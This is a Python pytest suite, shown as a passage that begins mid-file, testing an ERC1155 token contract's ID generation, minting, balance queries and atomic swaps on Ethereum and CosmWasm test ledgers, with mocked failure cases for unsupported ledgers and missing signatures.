@pytest.mark.ledger
class TestERC1155ContractEthereum(BaseContractTestCase, UseGanache):
"""Test the ERC1155 contract on Ethereum."""
ledger_identifier = EthereumCrypto.identifier
path_to_contract = Path(ROOT_DIR, "packages", "fetchai", "contracts", "erc1155")
@classmethod
def setup(cls):
"""Setup."""
super().setup(
ledger_config=ETHEREUM_TESTNET_CONFIG,
deployer_private_key_path=ETHEREUM_PRIVATE_KEY_PATH,
item_owner_private_key_path=ETHEREUM_PRIVATE_KEY_TWO_PATH,
)
cls.token_ids_a = [
340282366920938463463374607431768211456,
340282366920938463463374607431768211457,
340282366920938463463374607431768211458,
340282366920938463463374607431768211459,
340282366920938463463374607431768211460,
340282366920938463463374607431768211461,
340282366920938463463374607431768211462,
340282366920938463463374607431768211463,
340282366920938463463374607431768211464,
340282366920938463463374607431768211465,
]
cls.token_id_b = 680564733841876926926749214863536422912
@classmethod
def finish_contract_deployment(cls) -> str:
"""
Finish deploying contract.
:return: contract address
"""
contract_address = cls.ledger_api.get_contract_address(
cls.deployment_tx_receipt
)
if contract_address is None:
raise ValueError("Contract address not found!") # pragma: nocover
return contract_address
def test_generate_token_ids(self):
"""Test the generate_token_ids method of the ERC1155 contract."""
# setup
nft_token_type = 1
nb_tokens = 2
expected_toke_ids = [
340282366920938463463374607431768211456,
340282366920938463463374607431768211457,
]
# operation
actual_toke_ids = self.contract.generate_token_ids(nft_token_type, nb_tokens)
# after
assert actual_toke_ids == expected_toke_ids
def test_generate_id(self):
"""Test the _generate_id method of the ERC1155 contract."""
# setup
ft_token_type = 2
index = 0
expected_toke_id = 680564733841876926926749214863536422912
# operation
actual_toke_id = self.contract._generate_id(index, ft_token_type)
# after
assert actual_toke_id == expected_toke_id
def test_get_create_batch_transaction(self):
"""Test the get_create_batch_transaction method of the ERC1155 contract."""
# operation
tx = self.contract.get_create_batch_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
token_ids=self.token_ids_a,
)
# after
assert len(tx) == 7
assert all(
key in tx
for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to", "data"]
)
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto]
)
def test_get_create_single_transaction(self):
"""Test the get_create_single_transaction method of the ERC1155 contract."""
# operation
tx = self.contract.get_create_single_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
token_id=self.token_id_b,
)
# after
assert len(tx) == 7
assert all(
key in tx
for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to", "data"]
)
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto]
)
def test_get_mint_batch_transaction(self):
"""Test the get_mint_batch_transaction method of the ERC1155 contract."""
# operation
tx = self.contract.get_mint_batch_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
recipient_address=self.item_owner_crypto.address,
token_ids=self.token_ids_a,
mint_quantities=[1] * len(self.token_ids_a),
)
# after
assert len(tx) == 7
assert all(
key in tx
for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to", "data"]
)
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto]
)
def test_validate_mint_quantities(self):
"""Test the validate_mint_quantities method of the ERC1155 contract."""
# Valid NFTs
self.contract.validate_mint_quantities(
token_ids=self.token_ids_a, mint_quantities=[1] * len(self.token_ids_a),
)
# Valid FTs
token_id = 680564733841876926926749214863536422912
mint_quantity = 1
self.contract.validate_mint_quantities(
token_ids=[token_id], mint_quantities=[mint_quantity],
)
# Invalid NFTs
token_id = self.token_ids_a[0]
mint_quantity = 2
with pytest.raises(
ValueError,
match=re.escape(
f"Cannot mint NFT (token_id={token_id}) with mint_quantity more than 1 (found={mint_quantity})"
),
):
self.contract.validate_mint_quantities(
token_ids=[token_id], mint_quantities=[mint_quantity],
)
# Invalid: neither NFT nor FT
token_id = 1020847100762815390390123822295304634368
mint_quantity = 1
with pytest.raises(
ValueError,
match=re.escape(
f"The token type must be 1 or 2. Found type=3 for token_id={token_id}"
),
):
self.contract.validate_mint_quantities(
token_ids=[token_id], mint_quantities=[mint_quantity],
)
def test_decode_id(self):
"""Test the decode_id method of the ERC1155 contract."""
# FT
expected_token_type = 2
token_id = 680564733841876926926749214863536422912
actual_token_type = self.contract.decode_id(token_id)
assert actual_token_type == expected_token_type
# NFT
expected_token_type = 1
token_id = 340282366920938463463374607431768211456
actual_token_type = self.contract.decode_id(token_id)
assert actual_token_type == expected_token_type
def test_get_mint_single_transaction(self):
"""Test the get_mint_single_transaction method of the ERC1155 contract."""
# operation
tx = self.contract.get_mint_single_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
recipient_address=self.item_owner_crypto.address,
token_id=self.token_id_b,
mint_quantity=1,
)
# after
assert len(tx) == 7
assert all(
key in tx
for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to", "data"]
)
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto]
)
def test_get_balance(self):
"""Test the get_balance method of the ERC1155 contract."""
# operation
result = self.contract.get_balance(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
agent_address=self.item_owner_crypto.address,
token_id=self.token_id_b,
)
# after
assert "balance" in result
assert result["balance"][self.token_id_b] == 0
def test_get_balances(self):
"""Test the get_balances method of the ERC1155 contract."""
# operation
result = self.contract.get_balances(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
agent_address=self.item_owner_crypto.address,
token_ids=self.token_ids_a,
)
# after
assert "balances" in result
assert all(result["balances"][token_id] == 0 for token_id in self.token_ids_a)
def test_get_hash_single(self):
"""Test the get_hash_single method of the ERC1155 contract."""
# operation
result = self.contract.get_hash_single(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
from_address=self.deployer_crypto.address,
to_address=self.item_owner_crypto.address,
token_id=self.token_id_b,
from_supply=0,
to_supply=10,
value=1,
trade_nonce=1,
)
# after
assert isinstance(result, bytes)
def test_get_hash_batch(self):
"""Test the get_hash_batch method of the ERC1155 contract."""
# operation
result = self.contract.get_hash_batch(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
from_address=self.deployer_crypto.address,
to_address=self.item_owner_crypto.address,
token_ids=self.token_ids_a,
from_supplies=[0, 1, 0, 0, 1, 0, 0, 0, 0, 1],
to_supplies=[0, 0, 0, 0, 0, 1, 0, 0, 0, 0],
value=1,
trade_nonce=1,
)
# after
assert isinstance(result, bytes)
def test_generate_trade_nonce(self):
"""Test the generate_trade_nonce method of the ERC1155 contract."""
# operation
result = self.contract.generate_trade_nonce(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
agent_address=self.item_owner_crypto.address,
)
# after
assert "trade_nonce" in result
assert isinstance(result["trade_nonce"], int)
@pytest.mark.integration
def test_helper_methods_and_get_transactions(self):
"""Test helper methods and get transactions."""
expected_a = [
340282366920938463463374607431768211456,
340282366920938463463374607431768211457,
340282366920938463463374607431768211458,
340282366920938463463374607431768211459,
340282366920938463463374607431768211460,
340282366920938463463374607431768211461,
340282366920938463463374607431768211462,
340282366920938463463374607431768211463,
340282366920938463463374607431768211464,
340282366920938463463374607431768211465,
]
actual = self.contract.generate_token_ids(token_type=1, nb_tokens=10)
assert expected_a == actual
expected_b = [
680564733841876926926749214863536422912,
680564733841876926926749214863536422913,
]
actual = self.contract.generate_token_ids(token_type=2, nb_tokens=2)
assert expected_b == actual
tx = self.contract.get_deploy_transaction(
ledger_api=self.ledger_api, deployer_address=ETHEREUM_ADDRESS_ONE
)
assert len(tx) == 6
data = tx.pop("data")
assert len(data) > 0 and data.startswith("0x")
assert all(
[key in tx for key in ["value", "from", "gas", "gasPrice", "nonce"]]
), "Error, found: {}".format(tx)
tx = self.contract.get_create_batch_transaction(
ledger_api=self.ledger_api,
contract_address=ETHEREUM_ADDRESS_ONE,
deployer_address=ETHEREUM_ADDRESS_ONE,
token_ids=expected_a,
)
assert len(tx) == 7
data = tx.pop("data")
assert len(data) > 0 and data.startswith("0x")
assert all(
[
key in tx
for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to"]
]
), "Error, found: {}".format(tx)
tx = self.contract.get_create_single_transaction(
ledger_api=self.ledger_api,
contract_address=ETHEREUM_ADDRESS_ONE,
deployer_address=ETHEREUM_ADDRESS_ONE,
token_id=expected_b[0],
)
assert len(tx) == 7
data = tx.pop("data")
assert len(data) > 0 and data.startswith("0x")
assert all(
[
key in tx
for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to"]
]
), "Error, found: {}".format(tx)
mint_quantities = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
tx = self.contract.get_mint_batch_transaction(
ledger_api=self.ledger_api,
contract_address=ETHEREUM_ADDRESS_ONE,
deployer_address=ETHEREUM_ADDRESS_ONE,
recipient_address=ETHEREUM_ADDRESS_ONE,
token_ids=expected_a,
mint_quantities=mint_quantities,
)
assert len(tx) == 7
data = tx.pop("data")
assert len(data) > 0 and data.startswith("0x")
assert all(
[
key in tx
for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to"]
]
), "Error, found: {}".format(tx)
mint_quantity = 1
tx = self.contract.get_mint_single_transaction(
ledger_api=self.ledger_api,
contract_address=ETHEREUM_ADDRESS_ONE,
deployer_address=ETHEREUM_ADDRESS_ONE,
recipient_address=ETHEREUM_ADDRESS_ONE,
token_id=expected_b[1],
mint_quantity=mint_quantity,
)
assert len(tx) == 7
data = tx.pop("data")
assert len(data) > 0 and data.startswith("0x")
assert all(
[
key in tx
for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to"]
]
), "Error, found: {}".format(tx)
@pytest.mark.integration
def test_get_single_atomic_swap(self):
"""Test get single atomic swap."""
from_address = ETHEREUM_ADDRESS_ONE
to_address = ETHEREUM_ADDRESS_TWO
token_id = self.contract.generate_token_ids(token_type=2, nb_tokens=1)[0]
from_supply = 0
to_supply = 10
value = 1
trade_nonce = 1
tx_hash = self.contract.get_hash_single(
self.ledger_api,
self.contract_address,
from_address,
to_address,
token_id,
from_supply,
to_supply,
value,
trade_nonce,
)
assert isinstance(tx_hash, bytes)
signature = self.deployer_crypto.sign_message(tx_hash)
tx = self.contract.get_atomic_swap_single_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
from_address=from_address,
to_address=to_address,
token_id=token_id,
from_supply=from_supply,
to_supply=to_supply,
value=value,
trade_nonce=trade_nonce,
signature=signature,
)
assert len(tx) == 8
data = tx.pop("data")
assert len(data) > 0 and data.startswith("0x")
assert all(
[
key in tx
for key in [
"value",
"chainId",
"gas",
"gasPrice",
"nonce",
"to",
"from",
]
]
), "Error, found: {}".format(tx)
@pytest.mark.integration
def test_get_batch_atomic_swap(self):
"""Test get batch atomic swap."""
from_address = ETHEREUM_ADDRESS_ONE
to_address = ETHEREUM_ADDRESS_TWO
token_ids = self.contract.generate_token_ids(token_type=2, nb_tokens=10)
from_supplies = [0, 1, 0, 0, 1, 0, 0, 0, 0, 1]
to_supplies = [0, 0, 0, 0, 0, 1, 0, 0, 0, 0]
value = 1
trade_nonce = 1
tx_hash = self.contract.get_hash_batch(
self.ledger_api,
self.contract_address,
from_address,
to_address,
token_ids,
from_supplies,
to_supplies,
value,
trade_nonce,
)
assert isinstance(tx_hash, bytes)
signature = self.deployer_crypto.sign_message(tx_hash)
tx = self.contract.get_atomic_swap_batch_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
from_address=from_address,
to_address=to_address,
token_ids=token_ids,
from_supplies=from_supplies,
to_supplies=to_supplies,
value=value,
trade_nonce=trade_nonce,
signature=signature,
)
assert len(tx) == 8
data = tx.pop("data")
assert len(data) > 0 and data.startswith("0x")
assert all(
[
key in tx
for key in [
"value",
"chainId",
"gas",
"gasPrice",
"nonce",
"to",
"from",
]
]
), "Error, found: {}".format(tx)
@pytest.mark.integration
def test_full(self):
"""Setup."""
# Test tokens IDs
token_ids = self.contract.generate_token_ids(token_type=2, nb_tokens=10)
# create
tx = self.contract.get_create_batch_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
token_ids=token_ids,
)
tx_signed = self.deployer_crypto.sign_transaction(tx)
tx_receipt = self.ledger_api.send_signed_transaction(tx_signed)
time.sleep(1)
receipt = self.ledger_api.get_transaction_receipt(tx_receipt)
assert self.ledger_api.is_transaction_settled(receipt)
mint_quantities = [10] * len(token_ids)
# mint
tx = self.contract.get_mint_batch_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
recipient_address=self.deployer_crypto.address,
token_ids=token_ids,
mint_quantities=mint_quantities,
)
tx_signed = self.deployer_crypto.sign_transaction(tx)
tx_receipt = self.ledger_api.send_signed_transaction(tx_signed)
time.sleep(1)
receipt = self.ledger_api.get_transaction_receipt(tx_receipt)
assert self.ledger_api.is_transaction_settled(receipt)
tx = self.contract.get_mint_batch_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
recipient_address=self.item_owner_crypto.address,
token_ids=token_ids,
mint_quantities=mint_quantities,
)
tx_signed = self.deployer_crypto.sign_transaction(tx)
tx_receipt = self.ledger_api.send_signed_transaction(tx_signed)
time.sleep(1)
receipt = self.ledger_api.get_transaction_receipt(tx_receipt)
assert self.ledger_api.is_transaction_settled(receipt)
# batch trade
from_address = self.deployer_crypto.address
to_address = self.item_owner_crypto.address
from_supplies = [0, 1, 0, 0, 1, 0, 0, 0, 0, 1]
to_supplies = [0, 0, 0, 0, 0, 1, 0, 0, 0, 0]
value = 0
trade_nonce = 1
tx_hash = self.contract.get_hash_batch(
self.ledger_api,
self.contract_address,
from_address,
to_address,
token_ids,
from_supplies,
to_supplies,
value,
trade_nonce,
)
signature = self.item_owner_crypto.sign_message(
tx_hash, is_deprecated_mode=True
)
tx = self.contract.get_atomic_swap_batch_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
from_address=from_address,
to_address=to_address,
token_ids=token_ids,
from_supplies=from_supplies,
to_supplies=to_supplies,
value=value,
trade_nonce=trade_nonce,
signature=signature,
)
tx_signed = self.deployer_crypto.sign_transaction(tx)
tx_receipt = self.ledger_api.send_signed_transaction(tx_signed)
time.sleep(1)
receipt = self.ledger_api.get_transaction_receipt(tx_receipt)
assert self.ledger_api.is_transaction_settled(receipt)
class TestCosmWasmContract(BaseContractTestCase):
"""Test the cosmwasm contract."""
ledger_identifier = FetchAICrypto.identifier
path_to_contract = Path(ROOT_DIR, "packages", "fetchai", "contracts", "erc1155")
fund_from_faucet = True
@classmethod
def setup(cls):
"""Setup."""
# Test tokens IDs
super().setup(ledger_config=FETCHAI_TESTNET_CONFIG)
cls.token_ids_a = [
340282366920938463463374607431768211456,
340282366920938463463374607431768211457,
340282366920938463463374607431768211458,
340282366920938463463374607431768211459,
340282366920938463463374607431768211460,
340282366920938463463374607431768211461,
340282366920938463463374607431768211462,
340282366920938463463374607431768211463,
340282366920938463463374607431768211464,
340282366920938463463374607431768211465,
]
cls.token_id_b = 680564733841876926926749214863536422912
@classmethod
def finish_contract_deployment(cls) -> str:
"""
Finish deploying contract.
:return: contract address
"""
code_id = cast(FetchAIApi, cls.ledger_api).get_code_id(
cls.deployment_tx_receipt
)
assert code_id is not None
# Init contract
tx = cls._contract.get_deploy_transaction(
ledger_api=cls.ledger_api,
deployer_address=cls.deployer_crypto.address,
code_id=code_id,
init_msg={},
tx_fee=0,
amount=0,
label="ERC1155",
gas=1000000,
)
if tx is None:
raise ValueError("Deploy transaction not found!") # pragma: nocover
tx_receipt = cls.sign_send_confirm_receipt_multisig_transaction(
tx, cls.ledger_api, [cls.deployer_crypto]
)
contract_address = cls.ledger_api.get_contract_address(tx_receipt)
if contract_address is None:
raise ValueError("Contract address not found!") # pragma: nocover
return contract_address
@pytest.mark.integration
@pytest.mark.ledger
@pytest.mark.flaky(reruns=MAX_FLAKY_RERUNS)
def test_create_and_mint_and_balances(self):
"""Test cosmwasm contract create, mint and balances functionalities."""
# Create single token
tx = self.contract.get_create_single_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
token_id=self.token_id_b,
)
assert len(tx) == 2
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto]
)
# Create batch of tokens
tx = self.contract.get_create_batch_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
token_ids=self.token_ids_a,
)
assert len(tx) == 2
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto]
)
# Mint single token
tx = self.contract.get_mint_single_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
recipient_address=self.item_owner_crypto.address,
token_id=self.token_id_b,
mint_quantity=1,
)
assert len(tx) == 2
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto]
)
# Get balance of single token
res = self.contract.get_balance(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
agent_address=self.item_owner_crypto.address,
token_id=self.token_id_b,
)
assert "balance" in res
assert res["balance"][self.token_id_b] == 1
# Mint batch of tokens
tx = self.contract.get_mint_batch_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
recipient_address=self.item_owner_crypto.address,
token_ids=self.token_ids_a,
mint_quantities=[1] * len(self.token_ids_a),
)
assert len(tx) == 2
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto]
)
# Get balances of multiple tokens
res = self.contract.get_balances(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
agent_address=self.item_owner_crypto.address,
token_ids=self.token_ids_a,
)
assert "balances" in res
assert res["balances"] == {token_id: 1 for token_id in self.token_ids_a}
@pytest.mark.integration
@pytest.mark.ledger
@pytest.mark.flaky(reruns=MAX_FLAKY_RERUNS)
def test_cosmwasm_single_atomic_swap(self):
"""Test single atomic swap."""
# Create batch of tokens
tx = self.contract.get_create_batch_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
token_ids=self.token_ids_a,
)
assert len(tx) == 2
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto]
)
# Mint single ERC1155 token a[0] to Deployer
tx = self.contract.get_mint_single_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
recipient_address=self.deployer_crypto.address,
token_id=self.token_ids_a[0],
mint_quantity=1,
)
assert len(tx) == 2
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto]
)
# Store balance of Deployer's native tokens before atomic swap
original_deployer_balance = self.ledger_api.get_balance(
self.deployer_crypto.address
)
# Atomic swap
# Send 1 ERC1155 token a[0] from Deployer to Item owner
# Send 1 native token from Item owner to Deployer
tx = self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address=self.contract_address,
from_address=self.deployer_crypto.address,
to_address=self.item_owner_crypto.address,
token_id=self.token_ids_a[0],
from_supply=1,
to_supply=0,
value=1,
trade_nonce=0,
from_pubkey=self.deployer_crypto.public_key,
to_pubkey=self.item_owner_crypto.public_key,
)
assert len(tx) == 2
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto, self.item_owner_crypto]
)
# Check Item owner's ERC1155 token balance
result = self.contract.get_balance(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
agent_address=self.item_owner_crypto.address,
token_id=self.token_ids_a[0],
)
assert "balance" in result
assert result["balance"][self.token_ids_a[0]] == 1
# Check deployer's native token balance
deployer_balance = self.ledger_api.get_balance(self.deployer_crypto.address)
assert deployer_balance == original_deployer_balance + 1
# Other direction of atomic swap
# Send 1 ERC1155 token a[0] from Item owner to Deployer
# Send 1 native token from Item owner to Deployer
tx = self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address=self.contract_address,
from_address=self.deployer_crypto.address,
to_address=self.item_owner_crypto.address,
token_id=self.token_ids_a[0],
from_supply=0,
to_supply=1,
value=1,
trade_nonce=0,
from_pubkey=self.deployer_crypto.public_key,
to_pubkey=self.item_owner_crypto.public_key,
)
assert len(tx) == 2
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.item_owner_crypto]
)
# Check Item owner's ERC1155 token balance
result = self.contract.get_balance(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
agent_address=self.deployer_crypto.address,
token_id=self.token_ids_a[0],
)
assert "balance" in result
assert result["balance"][self.token_ids_a[0]] == 1
# Check deployer's native token balance
deployer_balance = self.ledger_api.get_balance(self.deployer_crypto.address)
assert deployer_balance == original_deployer_balance + 2
# Check invalid case with from_supply > 0 and to_supply > 0
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address=self.contract_address,
from_address=self.deployer_crypto.address,
to_address=self.item_owner_crypto.address,
token_id=self.token_ids_a[0],
from_supply=1,
to_supply=1,
value=1,
trade_nonce=0,
from_pubkey=self.deployer_crypto.public_key,
to_pubkey=self.item_owner_crypto.public_key,
)
@pytest.mark.integration
@pytest.mark.ledger
@pytest.mark.flaky(reruns=MAX_FLAKY_RERUNS)
def test_cosmwasm_batch_atomic_swap(self):
"""Test batch atomic swap."""
# Create batch of tokens
tx = self.contract.get_create_batch_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
token_ids=self.token_ids_a,
)
assert len(tx) == 2
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto]
)
# Mint single token a[0] to Deployer
tx = self.contract.get_mint_single_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
recipient_address=self.deployer_crypto.address,
token_id=self.token_ids_a[0],
mint_quantity=1,
)
assert len(tx) == 2
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto]
)
# Mint single token a[1] to Item owner
tx = self.contract.get_mint_single_transaction(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
deployer_address=self.deployer_crypto.address,
recipient_address=self.item_owner_crypto.address,
token_id=self.token_ids_a[1],
mint_quantity=1,
)
assert len(tx) == 2
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto]
)
# Store balance of Deployer's native tokens before atomic swap
original_deployer_balance = self.ledger_api.get_balance(
self.deployer_crypto.address
)
# Atomic swap
# Send 1 ERC1155 token a[0] from Deployer to Item owner
# Send 1 ERC1155 token a[1] from Item owner to Deployer
# Send 1 native token from Item owner to Deployer
tx = self.contract.get_atomic_swap_batch_transaction(
self.ledger_api,
contract_address=self.contract_address,
from_address=self.deployer_crypto.address,
to_address=self.item_owner_crypto.address,
token_ids=[self.token_ids_a[0], self.token_ids_a[1]],
from_supplies=[1, 0],
to_supplies=[0, 1],
value=1,
trade_nonce=0,
from_pubkey=self.deployer_crypto.public_key,
to_pubkey=self.item_owner_crypto.public_key,
)
assert len(tx) == 2
self.sign_send_confirm_receipt_multisig_transaction(
tx, self.ledger_api, [self.deployer_crypto, self.item_owner_crypto]
)
# Check Item owner's ERC1155 token balance
result = self.contract.get_balance(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
agent_address=self.item_owner_crypto.address,
token_id=self.token_ids_a[0],
)
assert "balance" in result
assert result["balance"][self.token_ids_a[0]] == 1
# Check Deployer's ERC1155 token balance
result = self.contract.get_balance(
ledger_api=self.ledger_api,
contract_address=self.contract_address,
agent_address=self.deployer_crypto.address,
token_id=self.token_ids_a[1],
)
assert "balance" in result
assert result["balance"][self.token_ids_a[1]] == 1
# Check deployer's native token balance
deployer_balance = self.ledger_api.get_balance(self.deployer_crypto.address)
assert deployer_balance == original_deployer_balance + 1
class TestContractCommon:
"""Other tests for the contract."""
@classmethod
def setup(cls):
"""Setup."""
# Register smart contract used for testing
cls.path_to_contract = Path(
ROOT_DIR, "packages", "fetchai", "contracts", "erc1155"
)
# register contract
configuration = cast(
ContractConfig,
load_component_configuration(ComponentType.CONTRACT, cls.path_to_contract),
)
configuration._directory = ( # pylint: disable=protected-access
cls.path_to_contract
)
if str(configuration.public_id) not in contract_registry.specs:
# load contract into sys modules
Contract.from_config(configuration)
cls.contract = contract_registry.make(str(configuration.public_id))
cls.token_ids_a = [
340282366920938463463374607431768211456,
]
# Create mock ledger with unknown identifier
cls.ledger_api = mock.Mock()
attrs = {"identifier": "dummy"}
cls.ledger_api.configure_mock(**attrs)
@pytest.mark.ledger
def test_get_create_batch_transaction_wrong_identifier(self):
"""Test if get_create_batch_transaction with wrong api identifier fails."""
# Test if function is not implemented for unknown ledger
with pytest.raises(NotImplementedError):
self.contract.get_create_batch_transaction(
ledger_api=self.ledger_api,
contract_address="contract_address",
deployer_address="address",
token_ids=self.token_ids_a,
)
@pytest.mark.ledger
def test_get_create_single_transaction_wrong_identifier(self):
"""Test if get_create_single_transaction with wrong api identifier fails."""
# Test if function is not implemented for unknown ledger
with pytest.raises(NotImplementedError):
self.contract.get_create_single_transaction(
ledger_api=self.ledger_api,
contract_address="contract_address",
deployer_address="address",
token_id=self.token_ids_a[0],
)
@pytest.mark.ledger
def test_get_mint_batch_transaction_wrong_identifier(self):
"""Test if get_mint_batch_transaction with wrong api identifier fails."""
# Test if function is not implemented for unknown ledger
with pytest.raises(NotImplementedError):
self.contract.get_mint_batch_transaction(
ledger_api=self.ledger_api,
contract_address="contract_address",
deployer_address="address",
recipient_address="address",
token_ids=self.token_ids_a,
mint_quantities=[1],
)
@pytest.mark.ledger
def test_get_mint_single_transaction_wrong_identifier(self):
"""Test if get_mint_single_transaction with wrong api identifier fails."""
# Test if function is not implemented for unknown ledger
with pytest.raises(NotImplementedError):
self.contract.get_mint_single_transaction(
ledger_api=self.ledger_api,
contract_address="contract_address",
deployer_address="address",
recipient_address="address",
token_id=self.token_ids_a[0],
mint_quantity=1,
)
@pytest.mark.ledger
def test_get_balance_wrong_identifier(self):
"""Test if get_balance with wrong api identifier fails."""
# Test if function is not implemented for unknown ledger
with pytest.raises(NotImplementedError):
self.contract.get_balance(
ledger_api=self.ledger_api,
contract_address="contract_address",
agent_address="address",
token_id=self.token_ids_a[0],
)
@pytest.mark.ledger
def test_get_balance_wrong_query_res(self):
"""Test if get_balance with wrong api identifier fails."""
# Create mock fetchai ledger that returns None on execute_contract_query
attrs = {"identifier": "fetchai", "execute_contract_query.return_value": None}
self.ledger_api.configure_mock(**attrs)
# Test if get balance returns ValueError when querying contract returns None
with pytest.raises(ValueError):
self.contract.get_balance(
ledger_api=self.ledger_api,
contract_address="contract_address",
agent_address="address",
token_id=self.token_ids_a[0],
)
@pytest.mark.ledger
def test_get_balances_wrong_query_res(self):
"""Test if get_balances with wrong api identifier fails."""
# Create mock fetchai ledger that returns None on execute_contract_query
attrs = {"identifier": "fetchai", "execute_contract_query.return_value": None}
self.ledger_api.configure_mock(**attrs)
# Test if get balance returns ValueError when querying contract returns None
with pytest.raises(ValueError):
self.contract.get_balances(
ledger_api=self.ledger_api,
contract_address="contract_address",
agent_address="address",
token_ids=self.token_ids_a,
)
@pytest.mark.ledger
def test_get_hash_batch_not_same(self):
"""Test if get_hash_batch returns ValueError when on-chain hash is not same as computed hash."""
self.ledger_api.identifier = "ethereum"
# Test if get hash returns ValueError when on chain hash is not same as computed hash
with mock.patch.object(type(self.contract), "_get_hash_batch", new=mock.Mock()):
with pytest.raises(ValueError):
self.contract.get_hash_batch(
ledger_api=self.ledger_api,
contract_address="contract_address",
from_address="address",
to_address="address",
token_ids=self.token_ids_a,
from_supplies=[1],
to_supplies=[0],
value=123,
trade_nonce=123,
)
@pytest.mark.ledger
def test_generate_trade_nonce_if_exist(self):
"""Test if generate_trade_nonce retries when nonce already exist."""
# Etherem ledger api mock
self.ledger_api.identifier = "ethereum"
# instance.functions.is_nonce_used(agent_address, trade_nonce).call() -> True, False
is_nonce_used_mock = mock.Mock()
is_nonce_used_mock.configure_mock(**{"call.side_effect": [True, False]})
# instance.functions.is_nonce_used(agent_address, trade_nonce) -> is_nonce_used_mock with call method
instance_mock = mock.Mock()
instance_mock.configure_mock(
**{"functions.is_nonce_used.return_value": is_nonce_used_mock}
)
# cls.get_instance(ledger_api, contract_address) -> instance_mock
get_instance_mock = mock.Mock()
get_instance_mock.configure_mock(**{"return_value": instance_mock})
# Patch get_instance method to return get_instance_mock which returns instance of instance_mock when called
with mock.patch.object(
type(self.contract), "get_instance", new=get_instance_mock
):
self.contract.generate_trade_nonce(
ledger_api=self.ledger_api,
contract_address="contract_address",
agent_address="address",
)
# Check if is_nonce_used was called twice
assert is_nonce_used_mock.call.call_count == 2
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_eth_no_signature(self):
"""Test if get_atomic_swap_single_transaction returns RuntimeError if signature not present on Ethereum case."""
self.ledger_api.identifier = "ethereum"
# Test if get_atomic_swap_single_transaction returns RuntimeError when signature is missing
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=1,
to_supply=0,
value=1,
trade_nonce=0,
)
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_eth_pubkeys(self):
"""Test if get_atomic_swap_single_transaction returns RuntimeError if pubkeys are present on Ethereum case."""
self.ledger_api.identifier = "ethereum"
# Test if get_atomic_swap_single_transaction returns RuntimeError when pubkey is present
with pytest.raises(RuntimeError):
